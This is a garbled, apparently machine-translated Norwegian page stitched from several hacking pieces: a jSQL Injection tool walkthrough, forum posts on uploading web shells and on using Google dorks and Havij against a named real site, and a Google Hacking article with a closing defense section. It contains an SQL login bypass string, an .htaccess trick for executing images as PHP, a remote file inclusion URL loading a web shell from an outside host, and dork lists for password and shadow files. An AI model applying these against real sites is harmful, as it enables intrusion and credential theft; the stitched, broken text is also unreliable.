Inurl php kapittel num personlig konto. Hvordan tjene penger ved å kunne PHP? La oss ikke glemme det åpenbare

Kjør den nedlastede filen ved å dobbeltklikke (du må ha virtuell maskin ).

3. Anonymitet når du sjekker et nettsted for SQL-injeksjon

Sette opp Tor og Privoxy i Kali Linux

[Seksjon under utvikling]

Sette opp Tor og Privoxy på Windows

[Seksjon under utvikling]

Proxy-innstillinger i jSQL Injection

[Seksjon under utvikling]

4. Sjekke stedet for SQL-injeksjon med jSQL-injeksjon

Å jobbe med programmet er ekstremt enkelt. Bare skriv inn nettadressen og trykk ENTER.

Følgende skjermbilde viser at nettstedet er sårbart for tre typer SQL-injeksjoner (informasjon om dem er angitt i nedre høyre hjørne). Ved å klikke på navnene på injeksjonene kan du bytte metode som brukes:

Også de eksisterende databasene har allerede blitt vist til oss.

Du kan se innholdet i hver tabell:

Vanligvis er det mest interessante med tabeller administratorlegitimasjonen.

Hvis du er heldig og finner administratorens data, er det for tidlig å glede seg. Du må fortsatt finne administrasjonspanelet hvor du skal legge inn disse dataene.

5. Søk etter admin paneler med jSQL Injection

For å gjøre dette, gå til neste fane. Her blir vi møtt med en liste over mulige adresser. Du kan velge én eller flere sider for å sjekke:

Bekvemmeligheten ligger i det faktum at du ikke trenger å bruke andre programmer.

Dessverre er det ikke så veldig mange uforsiktige programmerere som lagrer passord i klartekst. Ganske ofte i passordlinjen ser vi noe lignende

8743b52063cd84097a65d1633f5c74f5

Dette er en hasj. Du kan dekryptere den ved å bruke brute force. Og... jSQL Injection har en innebygd brute force.

6. Brute force hashes ved hjelp av jSQL Injection

Den utvilsomme fordelen er at du ikke trenger å lete etter andre programmer. Det er støtte for mange av de mest populære hashene.

Dette er ikke det meste beste alternativet. For å bli en guru i dekoding av hasjer, anbefales boken "" på russisk.

Men, selvfølgelig, når det ikke er noe annet program for hånden eller det ikke er tid til å studere, vil jSQL Injection med sin innebygde brute force-funksjon være veldig nyttig.

Det er innstillinger: du kan angi hvilke tegn som skal inkluderes i passordet, passordlengdeområdet.

7. Filoperasjoner etter oppdagelse av SQL-injeksjoner

I tillegg til operasjoner med databaser - lesing og endring av dem, hvis SQL-injeksjoner oppdages, kan følgende filoperasjoner utføres:

  • lese filer på serveren
  • laste opp nye filer til serveren
  • opplasting av skjell til serveren

Og alt dette er implementert i jSQL Injection!

Det er begrensninger - SQL-serveren må ha filrettigheter. De fornuftige systemadministratorer de er deaktivert og tilgang til filsystem vil ikke kunne få det.

Tilstedeværelsen av filrettigheter er ganske enkel å sjekke. Gå til en av fanene (lese filer, lage et skall, laste opp en ny fil) og prøve å utføre en av de angitte operasjonene.

En annen veldig viktig merknad - vi trenger å vite den nøyaktige absolutte banen til filen som vi skal jobbe med - ellers vil ingenting fungere.

Se på følgende skjermbilde:

På ethvert forsøk på å operere på en fil, mottar vi følgende svar: Ingen FILE-rettigheter(ingen filrettigheter). Og ingenting kan gjøres her.

Hvis du i stedet har en annen feil:

Problemer med å skrive inn i [katalognavn]

Dette betyr at du feilaktig spesifiserte den absolutte banen der du vil skrive filen.

For å gjette en absolutt bane, må du i det minste vite hvilket operativsystem serveren kjører på. For å gjøre dette, bytt til fanen Nettverk.

En slik rekord (linje Win64) gir oss grunn til å anta at vi har å gjøre med Windows OS:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Tilkobling: Keep-Alive Metode: HTTP/1.1 200 OK Innholdslengde: 353 Dato: fre 11. desember 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Her har vi litt Unix (*BSD, Linux):

Overføringskoding: chunked Dato: Fre, 11 Des 2015 11:57:02 GMT Metode: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Tilkobling: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

Og her har vi CentOS:

Metode: HTTP/1.1 200 OK Utløper: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Tilkobling: keep-alive X-Cache-Lookup: MISS fra t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS fra t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Dato: Fre, 11 Des 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

På Windows er en typisk mappe for nettsteder C:\Server\data\htdocs\. Men faktisk, hvis noen "tenkte på" å lage en server på Windows, så har denne personen svært sannsynlig ikke hørt noe om privilegier. Derfor bør du begynne å prøve direkte fra C:/Windows/-katalogen:

Som du ser gikk alt bra første gang.

Men selve jSQL Injection-skallene vekker tvil hos meg. Hvis du har filrettigheter, kan du enkelt laste opp noe med et nettgrensesnitt.

8. Massekontroll av steder for SQL-injeksjoner

Og til og med denne funksjonen er tilgjengelig i jSQL Injection. Alt er ekstremt enkelt - last ned en liste over nettsteder (kan importeres fra en fil), velg de du vil sjekke og klikk på riktig knapp for å starte operasjonen.

Konklusjon fra jSQL Injection

jSQL Injection er et godt, kraftig verktøy for å søke og deretter bruke SQL-injeksjoner som finnes på nettsteder. Dens utvilsomme fordeler: brukervennlighet, innebygde relaterte funksjoner. jSQL Injection kan bli bestevenn ny til nettstedsanalyse.

Blant manglene vil jeg merke meg umuligheten av å redigere databaser (av i det minste Jeg fant ikke denne funksjonaliteten). Som alle instrumenter med grafisk grensesnitt, kan en av ulempene med dette programmet tilskrives manglende evne til å bruke det i skript. Ikke desto mindre er noe automatisering også mulig i dette programmet - takket være den innebygde funksjonen til masseskanning.

etablert prøve og sertifikat. Av spesiell rabatt for alle fakulteter og kurs!

Med bruken av datamaskiner og internett har mange flere yrker dukket opp.


Programmeringsspesialister er nå etterspurt, fordi mange forskjellige prosjekter lanseres via Internett. Derfor bør alle søkere vurdere å velge en spesialitet relatert til datamaskiner.

Hvordan tjene penger ved å kunne PHP? I denne artikkelen skal vi se på et av områdene innen programmering. Skriptspråk brukes aktivt for applikasjonsutvikling.

Teknologien har vært relevant i mange år, og lærer du PHP kan du tjene gode penger. Det viktigste er at etterspørselen etter spesialister på dette feltet er enorm.

Hvor mye tjener en PHP-programmerer?

Det er umulig å nevne nøyaktig beløp, for alle jobber i ulike selskaper, og noen jobber til og med hjemmefra. I alle fall får aktive arbeidstakere god lønn.

De som jobber uten å forlate hjemmet får nøyaktig like mye som de klarer å gjennomføre bestillinger. Priser i en nisje er sjelden satt, oftest forhandles de individuelt.

På plussiden PHP-arbeid Som programmerer er det verdt å merke seg de seriøse utsiktene og relevansen til aktiviteten. I en tid hvor Internett penetrerer nesten alle områder, er det virkelig lønnsomt å jobbe som programmerer.


I denne artikkelen vil jeg snakke om de mest brukte metodene for å laste opp et skall til et nettsted. Web-skall er et slags ondsinnet skript (program) som angripere bruker for å kontrollere nettsteder eller servere.

Metode 1
Finn et skjema på nettsiden for opplasting av filer/bilder. La oss si at vi ikke klarte å hacke nettstedets administrasjonspanel og vi prøver å oversvømme skallet vårt med extension.php.jpg . Hvis det lykkes, vil vi se et hvitt vindu i stedet for bildet, vi høyreklikker og følger lenken. I tilfelle feil kan vi bruke krom utvidelse tukle data. Den lar deg avskjære og endre forespørselen som du vil. Hvis nettstedet sjekker filtypen, kan vi først laste opp .htaccess fil med innhold:
AddType application/x-httpd-php .jpg
Denne kommandoen vil gjøre jpg-filer som php.
Detaljerte videoinstruksjoner:

Videoinstruksjoner for installasjon av sabotasjedata:


Metode 2
Bruk programmet til å søke etter adminpaneler på nettstedet - https://github.com/bdblackhat/admin-panel-finder. Når programmet har funnet adminpanelet kan vi prøve sql-injection. I innloggings- og passordfeltet til nettstedet skriver vi inn koden:

" eller "1"="1 " ELLER 1=1/*

Hvis det fungerer, kommer vi til administrasjonspanelet og Vi fortsetter i henhold til metode 1. Hvis det ikke er noen sql-injeksjon i admin-panelet på nettstedet, kan vi prøve å feilsøke det eller finne en utnyttelse for dette CMS.
Detaljerte videoinstruksjoner:


Metode 3
I metode 3 vil vi se etter sql-injeksjon på selve siden. Vi kan gjøre dette manuelt eller bruke sqlmap. Det er nok emner på forumet om hvordan man utfører injeksjoner, så jeg kommer langveisfra. Så nå har vi allerede funnet en tabell med administratorens pålogging og passord, dekrypter hashen, gå til administrasjonspanelet og glede deg. Men la oss si at vi ikke kunne dekryptere passordet og alt gikk galt, da må vi sjekke privilegiene til brukeren vår . Vi sjekker privilegiene og laster inn mini-skallet. Av en eller annen grunn, når jeg vil lime inn koden, gir nettstedet meg en feilmelding.

Metode 4
Metode 4 innebærer csrf angrep. I koden nedenfor må vi erstatte http:// til mållenken vår. Velg skall og trykk på knappen laste opp.



Metode 5
Finn ut mer om målet ditt og finn en utnyttelse. Det er en veldig interessant nettside for dette - https://www.exploit-db.com. Ingen har kansellert den massive hackingen av nettsteder gjennom sårbarheter, men det er allerede en artikkel om dette på skjemaet.

Det er mange flere måter å fylle et skall, og det er ingen vits i å snakke om hver enkelt. Hvis du vil øve, så installer dvwa - det er et program utviklet for å hjelpe sikkerhetseksperter med å teste ferdighetene og verktøyene sine i et juridisk miljø.

Metode 6
Php-injeksjon- dette er en form for angrep på et nettsted når angriperen injiserer PHP-koden sin i den angrepne PHP-applikasjonen.

www.site.ru?page=home.html
Ved å utføre kommandoen vil vi laste home,html-siden. Nå skal vi prøve å laste inn et ondsinnet skall.
www.site.ru?page=http://hacker.ru/webshell.php
Dork: Inurl:side=

Det er også en måte å finne et allerede lastet skall ved å bruke perl

Og så, nå skal jeg fortelle deg hvordan du hacker noe uten noen spesiell kunnskap. Jeg vil si med en gang at det er liten nytte av dette, men likevel.
Først må du finne selve nettstedene. For å gjøre dette, gå til google.com og søk etter dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

her er en liten liste. Du kan bruke din. Og så fant vi siden. For eksempel http://www.vestitambov.ru/
Deretter laster du ned dette programmet

**Skjult innhold: For å se dette skjulte innholdet må antallet innlegg være 3 eller mer.**

Klikk OK. Så setter vi inn offersiden.
Vi trykker på start. Deretter venter vi på resultatene.
Og så fant programmet en SQL-sårbarhet.

Last deretter ned Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= lim inn den mottatte lenken der. Jeg vil ikke forklare hvordan du bruker Havij og hvor du skal laste det ned; det er ikke vanskelig å finne. Alle. Du har mottatt dataene du trenger - administratorpassordet, og så er det opp til fantasien din.

P.S. Dette er mitt første forsøk på å skrive noe. Beklager hvis noe er galt

Søkemotor Google-systemet(www.google.com) gir mange søkealternativer. Alle disse funksjonene er et uvurderlig søkeverktøy for en bruker som er ny på Internett og samtidig et enda kraftigere våpen for invasjon og ødeleggelse i hendene på mennesker med onde hensikter, inkludert ikke bare hackere, men også ikke-datakriminelle og til og med terrorister.
(9475 visninger på 1 uke)

Denis Barankov
denisNOSPAMixi.ru

Merk følgende:Denne artikkelen er ikke en veiledning til handling. Denne artikkelen ble skrevet for dere, WEB-serveradministratorer, slik at dere vil miste den falske følelsen av at dere er trygge, og dere vil endelig forstå lumskheten i denne metoden for å innhente informasjon og ta opp oppgaven med å beskytte nettstedet.

Introduksjon

For eksempel fant jeg 1670 sider på 0,14 sekunder!

2. La oss legge inn en annen linje, for eksempel:

inurl:"auth_user_file.txt"

litt mindre, men dette er allerede nok for gratis nedlasting og passordgjetting (ved å bruke samme John The Ripper). Nedenfor vil jeg gi en rekke flere eksempler.

Så du må innse at Google-søkemotoren har besøkt de fleste nettstedene og bufret informasjonen på dem. Denne bufrede informasjonen lar deg få informasjon om nettstedet og innholdet på nettstedet uten å koble deg direkte til nettstedet, bare ved å dykke ned i informasjonen som er lagret inne i Google. Dessuten, hvis informasjonen på nettstedet ikke lenger er tilgjengelig, kan informasjonen i hurtigbufferen fortsatt være bevart. Alt du trenger for denne metoden: kjenn noen søkeord Google. Denne teknikken kalles Google Hacking.

Informasjon om Google Hacking dukket først opp på Bugtruck-e-postlisten for 3 år siden. I 2001 ble dette temaet tatt opp av en fransk student. Her er en lenke til dette brevet http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Den gir de første eksemplene på slike spørsmål:

1) Indeks for /admin
2) Indeks for /passord
3) Indeks over /mail
4) Indeks over / +banker +filtype:xls (for Frankrike...)
5) Indeks for / +passwd
6) Indeks av / password.txt

Dette emnet skapte bølger i den engelsklesende delen av Internett ganske nylig: etter artikkelen av Johnny Long, publisert 7. mai 2004. For en mer fullstendig studie av Google Hacking, anbefaler jeg deg å gå til denne forfatterens nettsted http://johnny.ihackstuff.com. I denne artikkelen vil jeg bare bringe deg oppdatert.

Hvem kan bruke dette:
– Journalister, spioner og alle de menneskene som liker å stikke nesen inn i andres virksomhet kan bruke dette til å søke etter belastende bevis.
- Hackere som leter etter passende mål for hacking.

Hvordan Google fungerer.

For å fortsette samtalen, la meg minne deg på noen av søkeordene som brukes i Google-søk.

Søk med +-tegnet

Google ekskluderer ord den anser som uviktige fra søk. For eksempel spørreord, preposisjoner og artikler i engelske språk: for eksempel er, av, hvor. På russisk ser det ut til at Google anser alle ord som viktige. Hvis et ord ekskluderes fra søket, skriver Google om det. Til Google startet for å se etter sider med disse ordene, må du legge til et +-tegn uten mellomrom foran ordet. For eksempel:

ess +av base

Søk med tegnet –

Hvis Google finner et stort antall sider som den trenger å ekskludere sider med et bestemt emne fra, kan du tvinge Google til å søke kun etter sider som ikke inneholder bestemte ord. For å gjøre dette må du indikere disse ordene ved å plassere et skilt foran hvert - uten mellomrom før ordet. For eksempel:

fiske - vodka

Søk med ~

Det kan være lurt å søke etter ikke bare det angitte ordet, men også dets synonymer. For å gjøre dette, før ordet med ~-symbolet.

Finne en eksakt setning ved å bruke doble anførselstegn

Google søker på hver side etter alle forekomster av ordene du skrev i søkestrengen, og den bryr seg ikke om den relative plasseringen av ordene, så lenge alle de angitte ordene er på siden samtidig (dette er standardhandlingen). For å finne den eksakte setningen må du sette den i anførselstegn. For eksempel:

"bokstøtte"

For at minst ett av de angitte ordene skal vises, må du spesifisere logisk operasjon eksplisitt: ELLER. For eksempel:

bok sikkerhet ELLER beskyttelse

I tillegg kan du bruke *-tegnet i søkefeltet for å indikere et hvilket som helst ord og. å representere et hvilket som helst tegn.

Søk etter ord ved hjelp av ekstra operatører

Eksistere søkeoperatører, som er angitt i søkestrengen i formatet:

operator:search_term

Mellomrom ved siden av tykktarmen er ikke nødvendig. Hvis du setter inn et mellomrom etter kolon, vil du se en feilmelding, og før den vil Google bruke dem som en vanlig søkestreng.
Det er grupper av ekstra søkeoperatorer: språk - angi hvilket språk du vil se resultatet på, dato - begrense resultatene for de siste tre, seks eller 12 månedene, forekomster - angi hvor i dokumentet du trenger å søke etter linjen: overalt, i tittelen, i URL-en, domener - søk på det spesifiserte nettstedet eller, omvendt, ekskluder det fra søket; trygt søk - blokkerer nettsteder som inneholder den angitte typen informasjon og fjerner dem fra søkeresultatsidene.
Noen operatører krever imidlertid ikke en ekstra parameter, for eksempel forespørselen " cache:www.google.com" kan kalles som en fullverdig søkestreng, og noen søkeord krever tvert imot et søkeord, for eksempel " nettsted: www.google.com hjelp". I lys av emnet vårt, la oss se på følgende operatører:

Operatør

Beskrivelse

Krever du en ekstra parameter?

søk bare på nettstedet spesifisert i search_term

søk bare i dokumenter med typen search_term

finn sider som inneholder søkeord i tittelen

finn sider som inneholder alle søkeord i tittelen

finne sider som inneholder ordet søkeord i adressen deres

finn sider som inneholder alle søkeord-ord i adressen deres

Operatør nettstedet: begrenser søket bare til det angitte nettstedet, og du kan spesifisere ikke bare Domenenavn, men også en IP-adresse. Skriv for eksempel inn:

Operatør filtype: Begrenser søket til en bestemt filtype. For eksempel:

Fra og med publiseringsdatoen for artikkelen kan Google søke i 13 forskjellige filformater:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint(ppt)
  • Microsoft Word(dok)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash(swf)
  • Tekst (ans, txt)

Operatør link: viser alle sider som peker til den angitte siden.
Det er nok alltid interessant å se hvor mange steder på Internett som vet om deg. La oss prøve:

Operatør cache: Viser versjonen av nettstedet i Googles hurtigbuffer slik det så ut sist gang Google besøkte siden. La oss ta ethvert nettsted som endrer seg ofte og se:

Operatør intitle: søker etter det angitte ordet i sidetittelen. Operatør allintitle: er en utvidelse - den søker etter alle spesifiserte få ord i sidetittelen. Sammenligne:

intitle:flyging til Mars
intitle:flight intitle:på intitle:mars
allintitle:flight to mars

Operatør inurl: tvinger Google til å vise alle sider som inneholder den angitte strengen i nettadressen. allinurl-operator: søker etter alle ord i en URL. For eksempel:

allinurl:acid acid_stat_alerts.php

Denne kommandoen er spesielt nyttig for de som ikke har SNORT - i det minste kan de se hvordan det fungerer på et ekte system.

Hackingmetoder ved hjelp av Google

Så vi fant ut at ved å bruke en kombinasjon av de ovennevnte operatørene og nøkkelordene, kan hvem som helst samle inn nødvendig informasjon og søke etter sårbarheter. Disse teknikkene kalles ofte Google Hacking.

Site Map

Du kan bruke site:-operatoren til å liste opp alle koblingene som Google har funnet på et nettsted. Vanligvis blir sider som er dynamisk opprettet av skript ikke indeksert med parametere, så noen nettsteder bruker ISAPI-filtre slik at koblinger ikke er i skjemaet /article.asp?num=10&dst=5, og med skråstreker /article/abc/num/10/dst/5. Dette gjøres slik at nettstedet generelt blir indeksert av søkemotorer.

La oss prøve:

nettsted: www.whitehouse.gov whitehouse

Google tror at hver side på et nettsted inneholder ordet whitehouse. Det er dette vi bruker for å få alle sidene.
Det finnes også en forenklet versjon:

nettsted: whitehouse.gov

Og det beste er at kameratene fra whitehouse.gov ikke engang visste at vi så på strukturen til nettstedet deres og til og med så på de bufrede sidene som Google lastet ned. Dette kan brukes til å studere strukturen til nettsteder og se innhold, forblir uoppdaget inntil videre.

Vis en liste over filer i kataloger

WEB-servere kan vise lister over serverkataloger i stedet for de vanlige HTML-sider. Dette gjøres vanligvis for å sikre at brukerne velger og laster ned spesifikke filer. Men i mange tilfeller har administratorer ingen intensjon om å vise innholdet i en katalog. Dette oppstår på grunn av feil serverkonfigurasjon eller mangel på hjemmeside i katalogen. Som et resultat har hackeren en sjanse til å finne noe interessant i katalogen og bruke det til sine egne formål. For å finne alle slike sider er det nok å merke seg at de alle inneholder ordene: indeks av. Men siden ordindeksen for ikke bare inneholder slike sider, må vi avgrense søket og ta hensyn til søkeordene på selve siden, så spørringer som:

intitle:indeks.av overordnet katalog
intitle:indeks.av navnestørrelse

Siden de fleste katalogoppføringer er tilsiktet, kan det være vanskelig å finne feilplasserte oppføringer første gang. Men du kan i det minste allerede bruke oppføringer for å bestemme WEB-versjoner server som beskrevet nedenfor.

Innhenting av WEB-serverversjonen.

Å kjenne til WEB-serverversjonen er alltid nyttig før du starter et hackerangrep. Igjen, takket være Google, kan du få denne informasjonen uten å koble til en server. Hvis du ser nøye på katalogoppføringen, kan du se at navnet på WEB-serveren og dens versjon vises der.

Apache1.3.29 - ProXad Server på trf296.free.fr Port 80

En erfaren administrator kan endre denne informasjonen, men som regel er det sant. For å få denne informasjonen er det derfor nok å sende en forespørsel:

intitle:indeks.av server.at

For å få informasjon om en bestemt server, avklarer vi forespørselen:

intitle:index.of server.at site:ibm.com

Eller omvendt, vi ser etter servere som kjører på spesifikk versjon servere:

intitle:index.of Apache/2.0.40 Server på

Denne teknikken kan brukes av en hacker for å finne et offer. Hvis han for eksempel har en utnyttelse for en viss versjon av WEB-serveren, kan han finne den og prøve den eksisterende utnyttelsen.

Du kan også få serverversjonen ved å se sidene som er installert som standard når du installerer den nyeste versjonen av WEB-serveren. For eksempel å se testside Apache 1.2.6 bare skriv

intitle:Test.side.for.Apache det.fungerte!

Dessuten noen OS Under installasjonen installerer og starter de WEB-serveren umiddelbart. Noen brukere er imidlertid ikke engang klar over dette. Naturligvis, hvis du ser at noen ikke har fjernet standardsiden, er det logisk å anta at datamaskinen ikke har gjennomgått noen tilpasning i det hele tatt og sannsynligvis er sårbar for angrep.

Prøv å søke etter IIS 5.0-sider

allintitle:Velkommen til Windows 2000 Internett-tjenester

Når det gjelder IIS, kan du bestemme ikke bare serverversjonen, men også Windows-versjon og Service Pack.

En annen måte å finne WEB-serverversjonen på er å søke etter manualer (hjelpesider) og eksempler som kan være installert på nettstedet som standard. Hackere har funnet ganske mange måter å bruke disse komponentene på for å få privilegert tilgang til et nettsted. Det er derfor du må fjerne disse komponentene på produksjonsstedet. For ikke å nevne det faktum at tilstedeværelsen av disse komponentene kan brukes til å få informasjon om typen server og dens versjon. La oss for eksempel finne apache-manualen:

inurl: manuelle apache-direktivmoduler

Bruker Google som en CGI-skanner.

CGI-skanner eller WEB-skanner er et verktøy for å søke etter sårbare skript og programmer på offerets server. Disse verktøyene må vite hva de skal se etter, for dette har de en hel liste over sårbare filer, for eksempel:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/brukerreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Vi kan finne hver av disse filene med ved hjelp av Google, ved å bruke i tillegg med filnavnet i søkelinjen ordene index of eller inurl: vi kan finne nettsteder med sårbare skript, for eksempel:

allinurl:/random_banner/index.cgi

Ved å bruke tilleggskunnskap kan en hacker utnytte et skripts sårbarhet og bruke denne sårbarheten til å tvinge skriptet til å sende ut alle filer som er lagret på serveren. For eksempel en passordfil.

Slik beskytter du deg mot Google-hacking.

1. Ikke legg ut viktige data på WEB-serveren.

Selv om du har lagt ut dataene midlertidig, kan det hende du glemmer dem eller noen vil ha tid til å finne og ta disse dataene før du sletter dem. Ikke gjør dette. Det er mange andre måter å overføre data på som beskytter dem mot tyveri.

2. Sjekk nettstedet ditt.

Bruk metodene beskrevet for å undersøke nettstedet ditt. Sjekk nettstedet ditt med jevne mellomrom for nye metoder som vises på nettstedet http://johnny.ihackstuff.com. Husk at hvis du vil automatisere handlingene dine, må du få spesiell tillatelse fra Google. Hvis du leser nøye http://www.google.com/terms_of_service.html, så vil du se setningen: Du kan ikke sende automatiske forespørsler av noe slag til Googles system uten uttrykkelig tillatelse på forhånd fra Google.

3. Du trenger kanskje ikke Google for å indeksere nettstedet ditt eller deler av det.

Google lar deg fjerne en kobling til nettstedet ditt eller deler av det fra databasen, samt fjerne sider fra hurtigbufferen. I tillegg kan du forby søk etter bilder på nettstedet ditt, forby at korte fragmenter av sider vises i søkeresultater Alle muligheter for å slette et nettsted er beskrevet på siden http://www.google.com/remove.html. For å gjøre dette må du bekrefte at du virkelig er eieren av dette nettstedet eller sette inn tagger på siden eller

4. Bruk robots.txt

Det er kjent at søkemotorer ser på robots.txt-filen som ligger ved roten av nettstedet og ikke indekserer de delene som er merket med ordet Ikke tillat. Du kan bruke dette til å forhindre at deler av nettstedet blir indeksert. For å forhindre at hele nettstedet blir indeksert, oppretter du for eksempel en robots.txt-fil som inneholder to linjer:

Bruker agent: *
Disallow: /

Hva annet skjer

For at livet ikke skal virke som honning for deg, vil jeg til slutt si at det er nettsteder som overvåker de menneskene som ved hjelp av metodene som er skissert ovenfor, ser etter hull i skript og WEB-servere. Et eksempel på en slik side er

Applikasjon.

Litt søtt. Prøv noen av følgende selv:

1. #mysql dump filtype:sql - søk etter databasedumper mySQL-data
2. Oppsummeringsrapport om vertssårbarhet – viser deg hvilke sårbarheter andre har funnet
3. phpMyAdmin kjører på inurl:main.php - dette vil tvinge kontrollen til å lukkes gjennom phpmyadmin-panelet
4. ikke for distribusjon konfidensielt
5. Request Details Control Tree Server Variables
6. Kjører i barnemodus
7. Denne rapporten ble generert av WebLog
8. intitle:index.of cgiirc.config
9. filtype:conf inurl:brannmur -intitle:cvs – kanskje noen trenger brannmurkonfigurasjonsfiler? :)
10. intitle:indeks.over økonomi.xls – hmm....
11. intitle:Indeks over dbconvert.exe-chatter – icq chat-logger
12.intext:Tobias Oetiker trafikkanalyse
13. intitle:Bruksstatistikk for generert av Webalizer
14. intitle:statistikk over avansert nettstatistikk
15. intitle:index.of ws_ftp.ini – ws ftp config
16. inurl:ipsec.secrets har delte hemmeligheter - hemmelig nøkkel - godt funn
17. inurl:main.php Velkommen til phpMyAdmin
18. inurl:server-info Apache-serverinformasjon
19. site:edu admin karakterer
20. ORA-00921: uventet slutt på SQL-kommando – henter stier
21. intitle:index.of trillian.ini
22. intitle:Indeks av pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Indeks for .mysql_history
27. intitle:indeks av intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filtype:ini

  • "Hacking med Google"
  • Treningssenter "Informzashchita" http://www.itsecurity.ru - et ledende spesialisert senter innen trening informasjonssikkerhet(Lisens fra Moscow Committee of Education nr. 015470, statlig akkreditering nr. 004251). Det eneste autoriserte opplæringssenteret for Internet Security Systems og Clearswift i Russland og CIS-landene. Microsoft autorisert opplæringssenter (sikkerhetsspesialisering). Treningsprogrammene er koordinert med Statens tekniske kommisjon i Russland, FSB (FAPSI). Sertifikater for opplæring og statlige dokumenter om avansert opplæring.

    SoftKey er en unik tjeneste for kjøpere, utviklere, forhandlere og tilknyttede partnere. I tillegg er dette en av de beste nettbaserte programvarebutikkene i Russland, Ukraina, Kasakhstan, som tilbyr kundene et bredt spekter av produkter, mange betalingsmetoder, rask (ofte øyeblikkelig) ordrebehandling, sporing av bestillingsprosessen i den personlige delen, diverse rabatter fra butikken og produsenter BY.